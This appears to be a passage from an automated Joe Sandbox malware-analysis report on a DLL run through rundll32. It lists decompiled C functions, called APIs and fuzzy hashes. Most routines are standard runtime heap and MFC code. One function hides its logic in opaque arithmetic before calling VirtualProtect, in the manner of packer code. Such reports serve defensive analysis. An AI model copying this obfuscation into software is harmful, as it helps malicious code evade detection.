				if(_t31 == 0) {
					_t31 = _t31 + 1;
				}
				do {
					_t28 = 0;
					 *(_t33 - 0x1c) = 0;
					if(_t31 > 0xffffffe0) {
						L9:
						if(_t28 != 0 ||  *0x1004f58c == _t28) {
							L13:
							_t15 = _t28;
							L14:
							return E1001254F(_t15);
						} else {
							goto L11;
						}
					}
					if( *0x10050a64 != 3) {
						L7:
						if(_t28 != 0) {
							goto L13;
						}
						L8:
						_t17 = RtlAllocateHeap( *0x10050a60, 8, _t31); // executed
						_t28 = _t17;
						goto L9;
					}
					_t31 = _t31 + 0x0000000f & 0xfffffff0;
					 *(_t33 + 0xc) = _t31;
					_t23 =  *(_t33 - 0x20);
					_t40 = _t23 -  *0x10050a50; // 0x0
					if(_t40 > 0) {
						goto L7;
					}
					E10013A38(_t23, 0, 4);
					 *(_t33 - 4) =  *(_t33 - 4) & 0;
					_push(_t23);
					 *(_t33 - 0x1c) = E1001437A();
					 *(_t33 - 4) =  *(_t33 - 4) | 0xffffffff;
					E100138D4();
					_t28 =  *(_t33 - 0x1c);
					if(_t28 == 0) {
						goto L8;
					}
					E10011C50(_t28, 0,  *(_t33 - 0x20));
					_t34 = _t34 + 0xc;
					goto L7;
					L11:
				} while (E10014676(_t31) != 0);
				goto L14;
			}

APIs

__lock.LIBCMT ref: 1001386E
RtlAllocateHeap.NTDLL(00000008,?,10041E40,00000010,100151C5,00000001,0000008C,?,10015293,0000000D,10041EB0,00000010,10015375,?,10011310,00000000), ref: 100138AC

Memory Dump Source

Source File: 00000003.00000002.259153358.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.259148779.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259186666.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259228140.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259239658.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259292912.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: AllocateHeap__lock
String ID:
API String ID: 4078605025-0
Opcode ID: ca4ade39cfe2bb7f42d2cea73e663cfd7cd34fc626ac2018776e906fd1e55983
Instruction ID: 7e3eb1e6f8f5fb1ab58181eb2bcb74cf9bd6752373f8cd469f9ee3675e8c65d6
Opcode Fuzzy Hash: ca4ade39cfe2bb7f42d2cea73e663cfd7cd34fc626ac2018776e906fd1e55983
Instruction Fuzzy Hash: D711EF36D0076A9ADB01DBA48C41B9DB771FF807A0F12811AFC646F2E1DF34D9808B91

Uniqueness

Uniqueness Score: -1.00%

Function 100107C8 Relevance: 3.0, APIs: 2, Instructions: 35
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 18%

			E100107C8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				char _t9;
				intOrPtr _t12;
				intOrPtr _t21;
				void* _t22;

				_push(0xc);
				_push(0x10041d10);
				_t9 = E10012514(__ebx, __edi, __esi);
				_t21 =  *((intOrPtr*)(_t22 + 8));
				if(_t21 != 0) {
					if( *0x10050a64 != 3) {
						_push(_t21);
						goto L7;
					} else {
						E10013A38(__ebx, __edi, 4);
						 *(_t22 - 4) =  *(_t22 - 4) & 0x00000000;
						_t12 = E10013B9B(_t21);
						 *((intOrPtr*)(_t22 - 0x1c)) = _t12;
						if(_t12 != 0) {
							_push(_t21);
							_push(_t12);
							E10013BC6();
						}
						 *(_t22 - 4) =  *(_t22 - 4) | 0xffffffff;
						_t9 = E1001081B();
						if( *((intOrPtr*)(_t22 - 0x1c)) == 0) {
							_push( *((intOrPtr*)(_t22 + 8)));
							L7:
							_push(0);
							_t9 = RtlFreeHeap( *0x10050a60); // executed
						}
					}
				}
				return E1001254F(_t9);
			}

APIs

__lock.LIBCMT ref: 100107E6

Part of subcall function 10013A38: EnterCriticalSection.KERNEL32(?,?,?,10015293,0000000D,10041EB0,00000010,10015375,?,10011310,00000000,?,?,10011379,?,?), ref: 10013A60

RtlFreeHeap.NTDLL(00000000,?,10041D10,0000000C,10013A1C,00000000,10041E50,00000008,10013A51,?,?,?,10015293,0000000D,10041EB0,00000010), ref: 1001082D

Memory Dump Source

Source File: 00000003.00000002.259153358.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.259148779.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259186666.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259228140.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259239658.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259292912.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: CriticalEnterFreeHeapSection__lock
String ID:
API String ID: 3012239193-0
Opcode ID: a4ec4e95e76719edca13298b27ffeb92ed14bb756df65cea7ebe692d9a49c22e
Instruction ID: e2f95eda502a26e356ba5135cb18e14e48cd53293581a9dd67e0285628cf36ea
Opcode Fuzzy Hash: a4ec4e95e76719edca13298b27ffeb92ed14bb756df65cea7ebe692d9a49c22e
Instruction Fuzzy Hash: C0F09635D0A215AAEB10DB60CC46B4E3B64EF00760F208014F5906D0D1DF74E5C0CAD5

Uniqueness

Uniqueness Score: -1.00%

Function 1001070F Relevance: 3.0, APIs: 2, Instructions: 34
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 63%

			E1001070F(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				long _t19;
				void* _t21;
				void* _t24;

				_push(0xc);
				_push(0x10041d00);
				E10012514(__ebx, __edi, __esi);
				_t19 =  *(_t21 + 8);
				if( *0x10050a64 != 3) {
					L3:
					if(_t19 == 0) {
						_t19 = _t19 + 1;
					}
					if( *0x10050a64 != 1) {
						_t19 = _t19 + 0x0000000f & 0xfffffff0;
					}
					_t9 = RtlAllocateHeap( *0x10050a60, 0, _t19); // executed
				} else {
					_t24 = _t19 -  *0x10050a50; // 0x0
					if(_t24 > 0) {
						goto L3;
					} else {
						E10013A38(__ebx, __edi, 4);
						 *(_t21 - 4) =  *(_t21 - 4) & 0x00000000;
						_push(_t19);
						 *(_t21 - 0x1c) = E1001437A();
						 *(_t21 - 4) =  *(_t21 - 4) | 0xffffffff;
						E10010781();
						_t9 =  *(_t21 - 0x1c);
						if( *(_t21 - 0x1c) == 0) {
							goto L3;
						}
					}
				}
				return E1001254F(_t9);
			}

APIs

__lock.LIBCMT ref: 10010731

Part of subcall function 10013A38: EnterCriticalSection.KERNEL32(?,?,?,10015293,0000000D,10041EB0,00000010,10015375,?,10011310,00000000,?,?,10011379,?,?), ref: 10013A60

RtlAllocateHeap.NTDLL(00000000,?,10041D00,0000000C,1001079A,000000E0,100107C5,?,100139BB,00000018,10041E50,00000008,10013A51,?,?), ref: 10010772

Memory Dump Source

Source File: 00000003.00000002.259153358.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.259148779.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259186666.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259228140.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259239658.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259292912.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: AllocateCriticalEnterHeapSection__lock
String ID:
API String ID: 409319249-0
Opcode ID: 50d20e50f01447f42db1d42bb29e4d21c1024c3df395ccd2c9c31703fcb81017
Instruction ID: 42b023ab18c65cc465c375f16582ad1359b716bf9f3aedd515ba29da9f54a78b
Opcode Fuzzy Hash: 50d20e50f01447f42db1d42bb29e4d21c1024c3df395ccd2c9c31703fcb81017
Instruction Fuzzy Hash: 1DF06D75E45665ABEB10EB708C4AB8D7BB4FB003A1F150114F9A1AE1E1D7B0BAC08E95

Uniqueness

Uniqueness Score: -1.00%

Function 10013A83 Relevance: 3.0, APIs: 2, Instructions: 26
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E10013A83(intOrPtr _a4) {
				void* _t6;
				intOrPtr _t8;

				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
				 *0x10050a60 = _t6;
				if(_t6 == 0) {
					L4:
					return 0;
				} else {
					_t8 = E10013A69();
					 *0x10050a64 = _t8;
					if(_t8 != 3 || E10013B53(0x3f8) != 0) {
						return 1;
					} else {
						HeapDestroy( *0x10050a60);
						goto L4;
					}
				}
			}

0x10013a94
0x10013a9c
0x10013aa1
0x10013acd
0x10013acf
0x10013aa3
0x10013aa3
0x10013aab
0x10013ab0
0x10013ad3
0x10013ac1
0x10013ac7
0x00000000
0x10013ac7
0x10013ab0

APIs

HeapCreate.KERNEL32(00000000,00001000,00000000,10011217,00000001,?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10013A94

Part of subcall function 10013B53: HeapAlloc.KERNEL32(00000000,00000140,10013ABC,000003F8,?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10013B60

HeapDestroy.KERNEL32(?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10013AC7

Memory Dump Source

Source File: 00000003.00000002.259153358.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.259148779.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259186666.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259228140.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259239658.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259292912.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Heap$AllocCreateDestroy
String ID:
API String ID: 2236781399-0
Opcode ID: f6a2f7532e9ba5cb0f586e1f719da1c5d5a79765111272051b74937e09fd73f5
Instruction ID: e8a57e519fdf56151fc66cac883b31846c607769bf618c359d49edee3f1857a7
Opcode Fuzzy Hash: f6a2f7532e9ba5cb0f586e1f719da1c5d5a79765111272051b74937e09fd73f5
Instruction Fuzzy Hash: 6BE01A74A953559EEB01EB718C45B1A37E4EB44682F488829F442CD4A1EB70D680A602

Uniqueness

Uniqueness Score: -1.00%

Function 10003310 Relevance: 1.7, APIs: 1, Instructions: 197
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 89%

			E10003310() {
				long _t80;
				signed int _t83;
				signed int _t87;
				intOrPtr _t91;
				signed int _t101;
				signed int _t116;
				signed int _t122;
				intOrPtr _t126;
				signed int _t127;
				signed int _t132;
				signed int _t135;
				intOrPtr* _t137;
				intOrPtr* _t141;
				signed int _t150;
				signed int _t158;
				signed int _t165;
				signed int _t175;
				signed int _t186;
				signed int _t216;
				signed int _t223;
				signed int _t227;
				intOrPtr _t235;
				signed int _t238;
				void* _t239;

				_t80 =  *(_t239 + 0x18);
				_t126 =  *((intOrPtr*)(_t80 + 8));
				 *((intOrPtr*)(_t239 + 8)) = _t126;
				if(_t126 != 0) {
					_t132 =  *(_t80 + 0xc);
					_t127 =  *0x1004b0dc; // 0x0
					_t5 = _t127 + 1; // 0x1
					_t101 =  *0x1004b0ec; // 0x0
					_t165 =  *0x1004b0e0; // 0x0
					_t7 = _t165 + 0x1000000; // 0x1000000
					_t83 =  *0x1004b0e4; // 0x0
					_t150 =  *0x1004b0d8; // 0x0
					 *(_t239 + 0x10) = _t132;
					if((_t132 & _t83 * 0x7fffffff + _t165 + _t7 - _t5 * _t127 + _t101 + _t150 << 0x00000001) == 0) {
						_t35 = _t83 * _t165 + 1; // 0x1
						 *(_t239 + 0x1c) = _t83 * _t165;
						_t135 =  *0x1004b0e8; // 0x0
						asm("sbb ebp, ebp");
						asm("sbb edi, edi");
						_t216 =  *0x1004b0d8; // 0x0
						_t223 =  *0x1004b0d8; // 0x0
						asm("sbb esi, esi");
						_t158 =  *0x1004b0ec; // 0x0
						 *(_t239 + 0x14) =  *(0x1004b0f4 + ( ~( ~(_t135 * 0x7fffffff + (0x00000001 - _t135) * _t83 * _t165 +  *0x1004b0d8 + ((0x00000001 - _t216) * _t127 - _t83) * _t127 + _t135 * 0x7fffffff + (0x00000001 - _t135) * _t83 * _t165 +  *0x1004b0d8 + ((0x00000001 - _t216) * _t127 - _t83) * _t127 - 0x80000000 &  *(_t239 + 0x10))) + ( ~( ~(0x40000000 + ((_t35 * 0x3fffffff + _t135) * _t127 + (_t135 * _t165 + 0x00000001) * _t150) * 0x00000004 &  *(_t239 + 0x10))) +  ~( ~(_t150 + _t135 * 0x00000002 + _t135 + _t150 + _t135 * 0x00000002 + _t135 + 0x20000000 &  *(_t239 + 0x10))) * 2) * 2) * 4);
						_t175 =  *0x1004b0e0; // 0x0
						_t116 = _t158 * _t127;
						if(( *(_t239 + 0x10) & (_t116 * _t127 + _t116 * _t127 * 0x00000002 - 0x00000006) * _t127 + _t175 + _t175 - _t135 - _t158 + _t83 + _t223 + (_t175 + _t175 - _t135 - _t158 + _t83 + _t223) * 0x00000002 + 0x04000000) != 0) {
							 *(_t239 + 0x14) =  *(_t239 + 0x14) | _t158 * _t83 *  *0x1004b0e0 + 0x00000200 + _t158 * _t83 *  *0x1004b0e0 * 0x00000002;
						}
						_t186 =  *0x1004b0e0; // 0x0
						_t227 = _t158 * 0x3fffffff;
						_t122 =  *0x1004b0d8; // 0x0
						_t74 = _t227 + 1; // 0x1
						_t87 = VirtualProtect( *( *(_t239 + 0x30)),  *((intOrPtr*)(_t239 + 0x20)) + (_t83 * 0x3fffffff + (_t122 + _t74) * _t186 + _t122 + (2 -  *((intOrPtr*)(_t239 + 0x24)) - _t135 - _t158) * _t127) * 4,  *(_t239 + 0x18), _t239 + 0x28 + ((_t116 + _t135) * _t158 + _t186) * 8); // executed
						asm("sbb eax, eax");
						return  ~( ~_t87);
					} else {
						_t137 =  *((intOrPtr*)(_t239 + 0x28));
						_t235 =  *_t137;
						 *((intOrPtr*)(_t239 + 0x28)) = _t235;
						if(_t235 ==  *((intOrPtr*)(_t137 + 4))) {
							if( *((intOrPtr*)(_t137 + 0x10)) != 0) {
								L7:
								_t91 =  *((intOrPtr*)(_t239 + 0x24));
								 *((intOrPtr*)(_t91 + 0x20))( *(_t239 + 0x30),  *(_t239 + 0x1c), 0x4000 - _t101,  *((intOrPtr*)(_t91 + 0x34)));
							} else {
								_t141 =  *((intOrPtr*)(_t239 + 0x24));
								_t238 =  *(_t141 + 0x3c);
								if( *((intOrPtr*)( *_t141 + 0x38)) == _t238 || (_t150 + 2) * _t101 + _t83 + _t165 * 2 + ((_t150 + 2) * _t101 + _t83 + _t165 * 2) * 2 - (_t83 * _t127 * _t127 + 3 + _t83 * _t127 * _t127 * 2) *  *0x1004b0e8 +  *(_t239 + 0x18) % _t238 == 0) {
									goto L7;
								}
							}
						}
						return 1;
					}
				} else {
					return 1;
				}
			}

Memory Dump Source

Source File: 00000003.00000002.259153358.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.259148779.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259186666.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259228140.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259239658.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259292912.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f94f5a31096f78052b225d6198edabbe45c52cabc43602b45e44eff5801c83ed
Instruction ID: 1dc449bc3d80b5784a3a7ae21000a0fc3896a9c870339c3573936ee24331a343
Opcode Fuzzy Hash: f94f5a31096f78052b225d6198edabbe45c52cabc43602b45e44eff5801c83ed
Instruction Fuzzy Hash: 1A7129335043298FD314DF58C9C1646B7E9FB89310F058A2EDD699B3A5E670FE098AC4

Uniqueness

Uniqueness Score: -1.00%

Function 10037855 Relevance: 1.5, APIs: 1, Instructions: 39
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E10037855(intOrPtr* __ecx) {
				intOrPtr _t12;
				intOrPtr _t14;
				signed char* _t15;
				long* _t17;
				long* _t19;
				intOrPtr _t23;
				intOrPtr* _t26;
				void* _t28;

				E10011BF0(0x1003aa13, _t28);
				_push(__ecx);
				_t26 = __ecx;
				if( *__ecx == 0) {
					_t20 =  *0x1004eff0; // 0x1004eff4
					if(_t20 == 0) {
						 *((intOrPtr*)(_t28 - 0x10)) = 0x1004eff4;
						 *(_t28 - 4) =  *(_t28 - 4) & 0x00000000;
						_t15 = E1003768D(0x1004eff4);
						 *(_t28 - 4) =  *(_t28 - 4) | 0xffffffff;
						_t20 = _t15;
						 *0x1004eff0 = _t15; // executed
					}
					_t14 = E10037446(_t20); // executed
					 *_t26 = _t14;
				}
				_t17 =  *0x1004eff0; // 0x1004eff4
				_t23 = E10037552(_t17,  *_t26);
				if(_t23 == 0) {
					_t12 =  *((intOrPtr*)(_t28 + 8))();
					_t19 =  *0x1004eff0; // 0x1004eff4
					_t23 = _t12;
					E10037732(_t19,  *_t26, _t23);
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t28 - 0xc));
				return _t23;
			}

APIs

__EH_prolog.LIBCMT ref: 1003785A

Part of subcall function 1003768D: TlsAlloc.KERNEL32(?,10037884,?,?,?,100373C4,100347FD,100071DC), ref: 100376AF

Memory Dump Source

Source File: 00000003.00000002.259153358.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.259148779.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259186666.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259228140.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259239658.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259292912.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: AllocH_prolog
String ID:
API String ID: 3910492588-0
Opcode ID: afc1abf3d35d6b52cdf0f25188e220ecb9e5087980f930720a4386ab5437719b
Instruction ID: 4636a69bf69d573d2e706337ed3b04a464365e57385db0f45bc25e4442f629a4
Opcode Fuzzy Hash: afc1abf3d35d6b52cdf0f25188e220ecb9e5087980f930720a4386ab5437719b
Instruction Fuzzy Hash: 80018B396001A29FE72ACF18C851B6D77A2FB81362F10053EE996DB290DB349C00CB64

Uniqueness

Uniqueness Score: -1.00%

Function 100045D0 Relevance: 1.3, APIs: 1, Instructions: 10
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E100045D0(void* _a4, long _a8, long _a12, long _a16) {
				void* _t7;

				_t7 = VirtualAlloc(_a4, _a8, _a12, _a16); // executed
				return _t7;
			}

0x100045e4
0x100045ea

APIs

VirtualAlloc.KERNEL32(?,?,?,?), ref: 100045E4

Memory Dump Source

Source File: 00000003.00000002.259153358.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.259148779.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259186666.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259228140.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259239658.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259292912.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 79d8040eb94a772a3858464c411fe2626b1031866cac9e3cc93b0a28150a8e2a
Instruction ID: c6cc4055dfec23ff58d81a81712461c79eda0eebf3d1de213efbbce8f3264bb9
Opcode Fuzzy Hash: 79d8040eb94a772a3858464c411fe2626b1031866cac9e3cc93b0a28150a8e2a
Instruction Fuzzy Hash: FCC0EAB9608201AF9A04DB54C988C6BB7E9EBC8641F008909B59983210D630E8408B22

Uniqueness

Uniqueness Score: -1.00%

Function 100045F0 Relevance: 1.3, APIs: 1, Instructions: 8
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E100045F0(void* _a4, long _a8, long _a12) {
				int _t5;

				_t5 = VirtualFree(_a4, _a8, _a12); // executed
				return _t5;
			}

0x100045ff
0x10004605

APIs

VirtualFree.KERNELBASE(?,?,?), ref: 100045FF

Memory Dump Source

Source File: 00000003.00000002.259153358.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.259148779.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259186666.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259228140.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259239658.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259292912.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 174df1bf701f566af763c199529526010cd62a485baa78f61ffb0b3445841b2f
Instruction ID: 188741ce2ee140a107eafa4ec0cdb16d021ba485332012740db5241ef1f15393
Opcode Fuzzy Hash: 174df1bf701f566af763c199529526010cd62a485baa78f61ffb0b3445841b2f
Instruction Fuzzy Hash: D3C048B9218201BFEA04DB50CA88C2BB7A9EBC8A11F00C90DB88983210C630EC00DA22

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 1002592C Relevance: 15.1, APIs: 10, Instructions: 102
stringfileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1002592C(void* __ebx, void* __edi, void* __esi) {
				intOrPtr _t33;
				long _t35;
				intOrPtr* _t36;
				void* _t43;
				void* _t49;
				CHAR* _t69;
				void* _t74;
				void* _t76;

				E10011BF0(0x1003acd2, _t76);
				_t33 =  *0x1004c470; // 0x12db9c4b
				_t69 =  *(_t76 + 8);
				 *((intOrPtr*)(_t76 - 0x10)) = _t33;
				_t35 = GetFullPathNameA( *(_t76 + 0xc), 0x104, _t69, _t76 - 0x154);
				if(_t35 != 0) {
					if(_t35 < 0x104) {
						_t36 = E100243B2();
						_t67 =  *_t36;
						 *(_t76 + 8) =  *((intOrPtr*)( *_t36 + 0xc))() + 0x10;
						 *((intOrPtr*)(_t76 - 4)) = 0;
						E100258EA(0, _t69, _t76 + 8);
						if(PathIsUNCA( *(_t76 + 8)) != 0) {
							L15:
							_t74 = 1;
						} else {
							if(GetVolumeInformationA( *(_t76 + 8), 0, 0, 0, _t76 - 0x15c, _t76 - 0x158, 0, 0) != 0) {
								if(( *(_t76 - 0x158) & 0x00000002) == 0) {
									CharUpperA(_t69);
								}
								if(( *(_t76 - 0x158) & 0x00000004) != 0) {
									goto L15;
								} else {
									_t49 = FindFirstFileA( *(_t76 + 0xc), _t76 - 0x150);
									if(_t49 == 0xffffffff) {
										goto L15;
									} else {
										FindClose(_t49);
										if( *(_t76 - 0x154) == 0 ||  *(_t76 - 0x154) <= _t69 || lstrlenA(_t76 - 0x124) - _t69 +  *(_t76 - 0x154) >= 0x104) {
											goto L6;
										} else {
											lstrcpyA( *(_t76 - 0x154), _t76 - 0x124);
											goto L15;
										}
									}
								}
							} else {
								L6:
								_t74 = 0;
							}
						}
						E100014B0( &(( *(_t76 + 8))[0xfffffffffffffff0]), _t67);
						_t43 = _t74;
					} else {
						goto L3;
					}
				} else {
					lstrcpynA(_t69,  *(_t76 + 0xc), 0x104);
					L3:
					_t43 = 0;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t76 - 0xc));
				return E100117AE(_t43,  *((intOrPtr*)(_t76 - 0x10)));
			}

APIs

__EH_prolog.LIBCMT ref: 10025931
GetFullPathNameA.KERNEL32(?,00000104,?,?), ref: 1002595B
lstrcpynA.KERNEL32(?,?,00000104), ref: 1002596C

Part of subcall function 100258EA: lstrcpynA.KERNEL32(00000000,?,00000104), ref: 1002590F
Part of subcall function 100258EA: PathStripToRootA.SHLWAPI(00000000), ref: 10025916

PathIsUNCA.SHLWAPI(?,?,?), ref: 100259A1
GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000), ref: 100259C5
CharUpperA.USER32(?), ref: 100259DD
FindFirstFileA.KERNEL32(?,?), ref: 100259F6
FindClose.KERNEL32(00000000), ref: 10025A02
lstrlenA.KERNEL32(?), ref: 10025A1F
lstrcpyA.KERNEL32(?,?), ref: 10025A3E

Memory Dump Source

Source File: 00000003.00000002.259153358.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.259148779.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259186666.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259228140.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259239658.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259292912.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Path$Findlstrcpyn$CharCloseFileFirstFullH_prologInformationNameRootStripUpperVolumelstrcpylstrlen
String ID:
API String ID: 4080879615-0
Opcode ID: 0ef6f2e99765fa8eebebeb34d5511f989af001345e8d2ce3599a936882c97ade
Instruction ID: 1fd06765c8897f0dc9d05cfa7245a04573121f8266c58d07b0a106865c59afd7
Opcode Fuzzy Hash: 0ef6f2e99765fa8eebebeb34d5511f989af001345e8d2ce3599a936882c97ade
Instruction Fuzzy Hash: E531B271900168EFDB11CFA0DC88EEEBBBCEF45396F404266F406DA151D7319E848B90

Uniqueness

Uniqueness Score: -1.00%

Function 1002FE1B Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 164
keyboardtimeCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E1002FE1B(void* __ebx, intOrPtr* __ecx, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				struct tagPOINT _v28;
				intOrPtr _v40;
				signed char _v69;
				char _v76;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t62;
				intOrPtr _t68;
				intOrPtr _t70;
				intOrPtr _t77;
				short _t78;
				short _t85;
				short _t90;
				intOrPtr _t109;
				intOrPtr _t113;
				intOrPtr _t114;
				intOrPtr* _t116;

				_t113 = _a4;
				_t116 = __ecx;
				if(E10020B0B(__ecx, _t113) != 0) {
					L37:
					return 1;
				}
				_t114 =  *((intOrPtr*)(_t113 + 4));
				_v20 = E10008325(__ecx);
				if(( *(__ecx + 0x7c) & 0x00000020) != 0 || _t114 == 0x201 || _t114 == 0x202) {
					if(_t114 < 0x200 || _t114 > 0x209) {
						if(_t114 < 0xa0 || _t114 > 0xa9) {
							goto L30;
						} else {
							goto L8;
						}
					} else {
						L8:
						_v16 = E100373DB();
						_t70 = _a4;
						_v28.y =  *((intOrPtr*)(_t70 + 0x18));
						_v28.x =  *(_t70 + 0x14);
						ScreenToClient( *(_t116 + 0x1c),  &_v28);
						E10011C50( &_v76, 0, 0x30);
						_v76 = 0x28;
						_t77 =  *((intOrPtr*)( *_t116 + 0x6c))(_v28.x, _v28.y,  &_v76);
						_t128 = _v40 - 0xffffffff;
						_v8 = _t77;
						if(_v40 != 0xffffffff) {
							_push(_v40);
							E100107C8(0x201, _t114, _t116, _t128);
						}
						if(_t114 != 0x201 || (_v69 & 0x00000080) == 0) {
							_v12 = _v12 & 0x00000000;
							__eflags = _t114 - 0x201;
							if(_t114 != 0x201) {
								_t90 = GetKeyState(1);
								__eflags = _t90;
								if(_t90 < 0) {
									_v8 =  *((intOrPtr*)(_v16 + 0x78));
								}
							}
						} else {
							_v12 = 1;
						}
						if(_v8 < 0 || _v12 != 0) {
							_t78 = GetKeyState(1);
							__eflags = _t78;
							if(_t78 >= 0) {
								L28:
								 *((intOrPtr*)( *_t116 + 0x160))(0xffffffff);
